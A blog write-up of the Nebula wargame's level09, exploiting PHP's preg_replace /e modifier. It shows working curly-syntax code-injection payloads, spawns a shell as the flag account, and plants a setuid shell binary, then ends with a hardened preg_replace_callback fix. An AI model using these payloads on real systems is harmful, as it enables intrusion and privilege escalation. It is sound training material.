Monday, September 3, 2012

nebula level09

This time we're dealing with a vulnerable PHP script.
Source code:
The vulnerability is clearly the PREG_REPLACE_EVAL pattern modifier in preg_replace.
The purpose of the code seems to be the transformation of email addresses to a non-spambot-friendly format. Let's try to use it:
level09@nebula:~$ cat << EOF > lethal_data
> [email dmolotov@mail.ru]
> [email [uberskill@mail.ru]]
> EOF
level09@nebula:~$ ~flag09/flag09 lethal_data null
dmolotov AT mail dot ru
<uberskill AT mail dot ru>
We can exploit the script using PHP's so-called complex (curly) string syntax.
The matched email address is substituted into the replacement string as the argument to the 'spam' function, and the resulting string is then evaluated as PHP code. Normally that argument is just an email address, but by using complex syntax we can achieve arbitrary code execution, as follows:
level09@nebula:~$ cat > lethal_data
[email {${system($use_me)}}]
level09@nebula:~$ ~flag09/flag09 lethal_data getflag
You have successfully executed getflag on a target account
PHP Notice:  Undefined variable: You have successfully executed getflag on a target account in /home/flag09/flag09.php(15) : regexp code on line 1

Or you could even get a shell with the EUID of flag09:
level09@nebula:~$ ~flag09/flag09 lethal_data sh
sh-4.2$ id
uid=1010(level09) gid=1010(level09) euid=990(flag09) groups=990(flag09),1010(level09)
sh-4.2$ getflag
You have successfully executed getflag on a target account
But why settle for that when we can even have a SUID shell :)
level09@nebula:~$ cat > /tmp/shell.c
#include <unistd.h>
#include <stdlib.h>

int main()
{
    int euid = geteuid();

    setresuid(euid, euid, euid);
    system("sh");
    return 0;
}
level09@nebula:~$ make /tmp/shell
cc     /tmp/shell.c   -o /tmp/shell
level09@nebula:~$ ~flag09/flag09 lethal_data 'cp /tmp/shell /tmp/flag09_sh; chmod +s /tmp/flag09_sh'
PHP Notice:  Undefined variable:  in /home/flag09/flag09.php(15) : regexp code on line 1

level09@nebula:~$ /tmp/flag09_sh
sh-4.2$ id
uid=990(flag09) gid=1010(level09) groups=990(flag09),1010(level09)
sh-4.2$ getflag
You have successfully executed getflag on a target account
There are other ways to exploit the vulnerability as well. For instance, we don't need to rely on the $use_me variable at all: we can use $filename instead and execute the input file itself:
level09@nebula:~$ cat > lethal_data
sh # [email {${system($filename)}}]
level09@nebula:~$ chmod +x lethal_data
level09@nebula:~$ ~flag09/flag09 ./lethal_data null
sh-4.2$ id
uid=1010(level09) gid=1010(level09) euid=990(flag09) groups=990(flag09),1010(level09)
sh-4.2$ getflag
You have successfully executed getflag on a target account
Or we could use some PHP black magic and hardcode the command without quotes directly:
level09@nebula:~$ cat > lethal_data
[email {${system(sh)}}]
level09@nebula:~$ ~flag09/flag09 ./lethal_data null
PHP Notice:  Use of undefined constant sh - assumed 'sh' in /home/flag09/flag09.php(15) : regexp code on line 1
sh-4.2$ id
uid=1010(level09) gid=1010(level09) euid=990(flag09) groups=990(flag09),1010(level09)
sh-4.2$ getflag
You have successfully executed getflag on a target account
We got the flag by exploiting the same vulnerability with three different methods :)
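For contrast, here is a hardened version of the script's markup step. This is an added example, not the flag09.php from the level: the shape of the original (a spam() helper called through preg_replace with the e modifier on the "[email ...]" pattern, then "[" and "]" rewritten to "<" and ">") is assumed from the behaviour shown above. The fix is to replace the e modifier with preg_replace_callback, which passes the captured text to spam() as a plain string so nothing in the input is ever parsed as PHP. The e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so the callback form is also the only one that still works on current PHP.

```php
<?php
// Added example (not the level's flag09.php). Keeps the observed behaviour:
// "[email x@y.z]" becomes "x AT y dot z" and any remaining [ ] become < >,
// but without the /e (PREG_REPLACE_EVAL) modifier.

function spam($email)
{
    // Same rewriting the level's output shows: '.' -> ' dot ', '@' -> ' AT '
    $email = preg_replace('/\./', ' dot ', $email);
    $email = preg_replace('/@/', ' AT ', $email);
    return $email;
}

function markup($filename)
{
    $contents = file_get_contents($filename);

    // Vulnerable form (assumed shape of the original, shown for contrast only):
    // with /e the replacement string is evaluated as PHP after \\2 is pasted
    // in, so curly syntax inside the captured text is interpolated and run.
    //   $contents = preg_replace('/(\[email (.*)\])/e', 'spam("\\2")', $contents);

    // Hardened form: the callback receives the capture as a string value.
    // $m[1] is data, never code, regardless of what it contains.
    $contents = preg_replace_callback(
        '/\[email (.*)\]/',
        function ($m) { return spam($m[1]); },
        $contents
    );

    // Literal bracket rewriting; str_replace is enough here, no regex needed.
    $contents = str_replace(['[', ']'], ['<', '>'], $contents);
    return $contents;
}

// Demonstration on constructed input. The second line is the curly-syntax
// string from the writeup; single quotes keep PHP from interpolating it here.
$tmp = tempnam(sys_get_temp_dir(), 'lvl09');
file_put_contents(
    $tmp,
    '[email dmolotov@mail.ru]' . "\n" .
    '[email [uberskill@mail.ru]]' . "\n" .
    '[email {${system($use_me)}}]' . "\n"
);
echo markup($tmp);
unlink($tmp);
```

Run with `php markup.php`: the first two lines come out exactly as the level printed them (the nested brackets become angle brackets), while the third is emitted verbatim as the literal text `{${system($use_me)}}`, because preg_replace_callback never evaluates the capture. The second command-line argument ($use_me) is dropped entirely, since the hardened script has no use for it; the original only ever reached it through the evaluated replacement.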

~ Dmitry
